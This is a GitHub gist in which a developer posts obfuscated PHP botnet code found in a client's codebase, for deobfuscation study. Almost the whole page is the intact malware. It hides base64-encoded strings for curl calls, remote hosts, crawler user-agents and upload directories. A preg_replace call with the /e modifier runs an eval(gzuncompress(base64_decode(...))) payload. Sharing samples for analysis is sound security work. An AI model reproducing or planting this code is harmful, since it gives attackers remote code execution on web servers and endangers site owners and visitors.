Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
Found this botnet code in a client's codebase. Cleaned it up, then went about de-obfuscating it to figure out what it was doing. http://ryepdx.com/2013/02/deobfuscating-a-botnet-infection/
<?php
/*versio:2.18*/$QQOO=0;if (!function_exists('Q0QQOOQO')){$GLOBALS['QQOO'] = 'hY3VybAX2luaXQ)W*YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLw TJndheT1maWxlX2dldF9jb250ZW50cw{aX3NldG9wdAHX2V4ZWMSaC~ujJndheT1jdXJsikSMnDCLwfpb3Nvbi5pbglYS1pbi1hLWNpcmNsZS5jb20.rYcGhwYWlkZS5jb20!dwJWV8DES~&OgGY{ZGlzcGxheV9lcnJvcnM*ZGV0ZXJtaW5hdG9yZnRwMTM.Mi4xOA~NUVFRT1EwT1EwT09RT1FPYmFzZTY0X2RlY29kZQRGYmFzZTY0X2VuY29kZQuSFRUUF9IT1NUdW5pb24XOO@b!c2VsZWN0MmUkVRVUVTVF9VUkkduVU0NSSVBUX05BTUUELQUVVFUllfU1RSSU5HPwq&dL3RtcC8uZm9udC11bml4kuzVE1QI VEVNUAVE1QRElSfCHC)dG1wd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQqdXBsb2FkX3RtcF9kaXIBXL3RtcAR@ LgJdmVyc2lvOLQnyLXBocAzPrjyLSFRUUF9FWEVDUEhQVvYb3V0kMUb2s=yLSFRUUF9VU0VSX0FHRU5UiqLAHRZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgIk$L3BnLnBocD91PQJms9JnQ9cGhwJnA9JnY9EZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5VlY0MXZvbGdRLzFkZVRkTkE0bklnNHNmMXVHaTY5a3JTazJwMWswM1hFRmVmTFZrRUEzamRwdkYvdjVsNUQzaFcycjJyVGNRMzgrWjdmak9FRzZhZHJma21qUGxhYTZ4NXp0TnRHQy96SkczbytpdmI3T05WSGlZeFV5bkJoaWNiN2R5eklpdnltdXppM0tOSDVyTHgvUFpXWjYrc090bUdxelRKd3kzWDhuVFA5VXVXOG55Znhrd1ZBYWVIU3RNanp6ZGh4SUVJTkF2a24wLzhDZnlCTmZCa3dqK0luWmlUaWU5UGZNMXFzZzdjSng1ekFoVEpZNVFjM1NickFzY2dqTU1nNDdsV1hRVkt5OVNiekFKeUNIRWdsc2NhRnAyNWlrb2JEM1hoSnRwdnVRTTBHRzhHcXlUT2VaeG5sUWk3RHdwTW5SbE1Pb1JQd2lPamt1bUFIellvS3VNalJXTmtlSlJ4TksrSVVNQi9oaG1va0Q3cklqRHdoSUVaeUZNTmcrSkZrUmQ1ZFVIcDJXUVY4WGhvVkExUHZ5MGpKK1ZvVWt1VFhjMm50LzdkTElDdkp2dWZubG9taE05cTZSOEt2aGtOUDQrbXpjMFNYUCtRY1RxYXphZmoyWFE0dnIrR0M3TEczdWUvOHNmajBkVnM1djA5OHVlekpuTkU3WUNSUGdWUFJLTzRoNkpXK3pRS1ZsR1NjZVVVMDhHM3UveEZrNWNoQ1pXWXl0Y1doQm40RDJWV0JVK1IxYktFTVA2RFRaYXNmaVE3SGxlbDN6T3AvSDNUeHdmUFE3ZUUwV2hCMFQ0b0JuSnVtclhLMlhGN2drdWIzUjdMcCtqZnhsK2pHWHVWbVRwY1BDOWZYTFNFNSt4bU5ydjd6VExNYittMytDYko4dCtCVFpoMndLTUdCUThWWStQZDNkd0YvcjJoNk85Z254aDQvbVUwdmZmOGNZM3VlY2JUVDhOSDZCa1VMb1NSOEVMQjh4T0N3ZGtIK0NQOTA5bkZCZFBlNEEzN1ZKSC9BR3VxU0JrWWNXaFp4UmlyMVNNb0dteGt2a3Q0QWhreVMvem5Ma3JXWEd1VU5qWUxrY0MzanhGaEpQZUR1YWo2T2R6VzNCTjhwQk0vK0RzaUxjTTBYYjRvTUdTYjFGcEtzMWx0UUl5V2ZYVFV3YzV5c0xOS01IMU93NXdjc2FCNG12QU5Ma1VRQlZFK29NMktBTDFrMFFtbVNoNkNCRFFxc0E4MmhTQzZVZ3E2VkdKRkZPbExxVC9aNTVCd2pmb3Fza1F4UTZHQlNMNTZTaFRiZTFBc3RtNUlScVdLRUlXZ2l1UkZnK0xYb0N5ZEFub2ZFYWl2aTdJWFE2Mml0aXlrZGlUZVk3bjd2dTlXWk5zUmNFZU40SnNLcFczTElZUFk0SGtLQldHN1JUMkd3T0JQRkZJWFNGYXZST0ZJSWZVVkVqYVQreFpDUzRyaFpubWFKMUh5ekZOdGNCN2NqNmJRU2c4VnYyVVNtR0toYlpLVUwxZFBrTmNBRzNxWk1SbE05ODhxNnBoM0VMbExNazBlVnZtMld5Mk1BRUlaU25pUTF4ZHVEWjRWTStsZFdSak4zbitUZFFDcnRMTXdvOVk1ZGJIdFVGVXZ4TVI5bjA3NGZVcnUySUtNa0ZrYndwNUZaYkg0bFhoRFhRSDZ0QVBBZ1B0SW91Z0ZhclVKRlpWYnBMWHVWdWtuWWhRQS9zUjBCOXUxVXd3RFE5YWxJWEZXRnFNYzRZQWM3anBNNHlVQVh4QmNlN2VqSU5DTno5NFVocDAvL1FyYTdvYlRJVHpLeWpmTkVtVXFyOXBtUzI1RU5mYTFXMkJmVzEvVUUyM2F3d1J4TlA3eXpyVmpDdTVSdlhwS0lVMjZWc0ZCMnpGUlhDMEZnYUtlMU8wQnFZVituV3g0am1rUlpxaEE2bUFqSUZBY2RaVU1HL1VWSXFVbDIrbE1MZ0x5VUg4dDZJWmJHMyt4YVdZQkl1cnllOFNQYjVMcHVJMkp3MHYySGZUL0tDZEV2dDI1Si80NUdDL0NTQ29icWFMTVVnUEhlUEExR001bk40MkY2MHEyQW9NTFJCMUlyRmJFdGpGQnpRSVJGWVZ0dXdCbEJGR1YwTVhJbGZ0SmhFUEJsZUJZMTMyTzA1ZmRoMU9HLzdPTWlsc2c0eGZtWVZiYlIzbnJPVGhFYUFiQmpweHJKajBXQVJkdkZSQkIwcFVuKzlXVCtFa3ZCNnRvditaQkVxOTRjU2hRampZR2F0NEJiSUk4WHVFVWwwZmwvb3daRzN3TTFVNWZ6SW9qcUM2MmlaS3JZMUZrRmFjNitBN2l3RlNueXB2UStSc2dGeVkwUytxWjYxN1Q1aXpZVkZmbHV3TDhxYXRpcDR2WTA4YUVrbDlWUWp1OVBnYTVLQzJGMExkcDhweldRTmQwNUJXcW1rdXh0MW9XS0t4ZTdXalJnUVdwZXJ1N2ZKT1N3M0hsdytkZk5Bb0pIZz09IikpKTsscHJlZ19yZXBsYWNlRj';function Q0QQOOQO($a, $b){$c=$GLOBALS['QQOO']; $d=pack('H*','626173'.'6536345f6465636f6465'); return $d(substr($c, $a, $b));};$Ill11I1lI = Q0QQOOQO(3274, 16);$Ill11I1lI("/II1l1IIIl/e", Q0QQOOQO(710, 2563), "II1l1IIIl");};
?>
jperl commented Apr 21, 2013

Wow this is interesting

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment